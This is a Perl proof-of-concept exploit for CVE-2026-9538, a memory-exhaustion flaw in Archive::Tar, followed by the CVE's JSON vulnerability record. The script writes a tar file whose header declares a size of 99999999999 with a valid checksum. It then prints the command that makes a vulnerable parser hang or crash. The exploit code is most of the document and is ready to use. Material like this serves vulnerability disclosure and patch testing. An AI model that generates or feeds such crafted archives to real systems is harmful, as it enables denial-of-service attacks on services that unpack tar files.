CVE-2026-9538

#!/usr/bin/perl # PoC for CVE-2026-9538: Memory Exhaustion in Archive::Tar # This script generates a crafted tar file with a massive size field. my $filename = "exploit_CVE-2026-9538.tar"; open(my $fh, '>', $filename) or die "Cannot open file: $!"; # Construct a malicious TAR Header (512 bytes) my $header = "A" x 100; # Name $header .= "0000644\x00"; # Mode $header .= "0000000\x00"; # Uid $header .= "0000000\x00"; # Gid # Vulnerability: Size field set to a huge number (e.g., 10GB+) # This value is taken directly from the header without bounds checking. $header .= "99999999999\x00"; # Size (12 bytes) $header .= "00000000000\x00"; # Mtime $header .= " "; # Checksum placeholder (spaces) $header .= "0"; # Typeflag (regular file) $header .= "\x00" x 100; # Linkname $header .= "ustar\x00"; # Magic $header .= "00"; # Version $header .= "\x00" x 32; # Uname $header .= "\x00" x 32; # Gname $header .= "\x00" x 8; # Devmajor $header .= "\x00" x 8; # Devminor $header .= "\x00" x 155; # Prefix # Pad header to 512 bytes $header .= "\x00" x (512 - length($header)); # Calculate checksum (sum of bytes + checksum field as spaces) my $sum = 0; for (my $i = 0; $i < 512; $i++) { $sum += ord(substr($header, $i, 1)); } # Insert checksum into header my $checksum_str = sprintf("%06o\x00 ", $sum); substr($header, 148, 8) = $checksum_str; print $fh $header; close($fh); print "[+] Created malicious tar file: $filename\n"; print "[+] To trigger the vulnerability, run the following command on a vulnerable system:\n"; print " perl -MArchive::Tar -e 'Archive::Tar->new()->read(\"$filename\")'\n"; print "[+] Expected result: Process hangs or crashes due to Out Of Memory (OOM).\n";

{"cve": {"id": "CVE-2026-9538", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-26T02:16:41.150", "lastModified": "2026-05-27T17:24:29.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Archive::Tar versions before 3.10 for Perl allow memory exhaustion via attacker controlled entry size field in tar header.\n\n_read_tar() reads each entry's payload with $handle->read($$data, $block), where $block is derived from the entry's 12-byte size field in the tar header with no upper bound on that value.\n\nA crafted header declaring a multi-gigabyte size causes Perl to allocate a scalar of that size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:archive\\:\\:tar_project:archive\\:\\:tar:*:*:*:*:*:perl:*:*", "versionEndExcluding": "3.10", "matchCriteriaId": "0D0D2922-4664-4650-8D9E-C8D5641A7106"}]}]}], "references": [{"url": "https://github.com/jib/archive-tar-new/commit/f9af01426038e29d9578825a0cd3626946ab08c7.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "https://metacpan.org/release/BINGOS/Archive-Tar-3.10/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/26/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}